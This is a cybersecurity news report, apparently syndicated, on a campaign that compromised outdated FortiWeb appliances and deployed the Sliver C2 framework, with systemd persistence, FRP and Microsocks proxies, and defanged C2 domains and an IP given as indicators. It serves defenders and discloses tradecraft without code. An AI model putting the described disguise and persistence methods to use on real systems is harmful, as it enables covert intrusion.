By rssfeeds-admin 
The campaign was detected during open-directory threat-hunting on Censys, where exposed Sliver databases and logs revealed extensive compromise activity.
Many affected FortiWeb devices were running outdated versions from 5.4.202 to 6.1.62, lacking integrated detection and monitoring capabilities.
Exploitation and Silver Deployment
Ctrlaltintel suggests that the attacker gained initial access by exploiting public-facing services via the React2Shell (CVE-2025-55182) vulnerability and other unpatched FortiWeb flaws.
Although the precise exploit used on FortiWeb remains unknown, the devices were all substantially outdated. Once compromised, the attacker deployed the open-source Sliver C2 toolkit, renaming the binary to “system-updater” and placing it in the/bin/.root/system-updater path.
Two primary C2 servers were identified as the command hubs: ns1.ubunutpackages[.]store and ns1.bafairforce[.]army, both registered under Autonomous System 62005.
The operators disguised these servers behind deceptive websites, including a fake “Ubuntu Packages” page and an imitation of the Bangladesh Air Force recruitment site.
The Bangladesh-themed infrastructure closely mirrors several victims located in the country, indicating that this operation was likely targeted rather than opportunistic.
Between December 22 and December 30, 2025, researchers recorded 30 unique victim IPs beaconing to these Silver instances, including organizations based in Bangladesh, Pakistan, India, South Africa, and the United States.
Persistence and Proxy Infrastructure
To maintain persistence, the threat actor configured malicious systemd and supervisor services under the names “Updater Service” and “rootbinary.”
These ensured automatic execution of the Sliver binary during system boot or after process failure, corresponding to MITRE ATT&CK persistence technique T1543.002.
Beyond persistence, the attacker expanded access by deploying the Fast Reverse Proxy (FRP) tool, which was downloaded from a public server at 45.83.181[.]160:8003.
The FRP service was used to expose internal network resources to external networks, thereby turning compromised FortiWeb hosts into proxy nodes for remote command execution.
In addition, the adversary employed Microsocks for SOCKS proxying, disguising the binary as “cups-lpd” to mimic the legitimate CUPS printing daemon on port 515.
This binary even contained optional, hard-coded credentials, allowing remote, authenticated access when configured with specific runtime options.
The campaign underscores the ongoing risk posed by outdated edge appliances that lack endpoint protection or threat telemetry.
Without appropriate monitoring, these devices provide ideal footholds for adversaries deploying post-exploitation frameworks such as Sliver, enabling prolonged, undetectable access across enterprise networks.
Follow us on Google News , LinkedIn and X to Get More Instant Updates, Set Cyberpress as a Preferred Source in Google.
The post Threat Actor Leverages Multiple FortiWeb Appliances to Deploy Sliver C2 for Long-Term Access appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.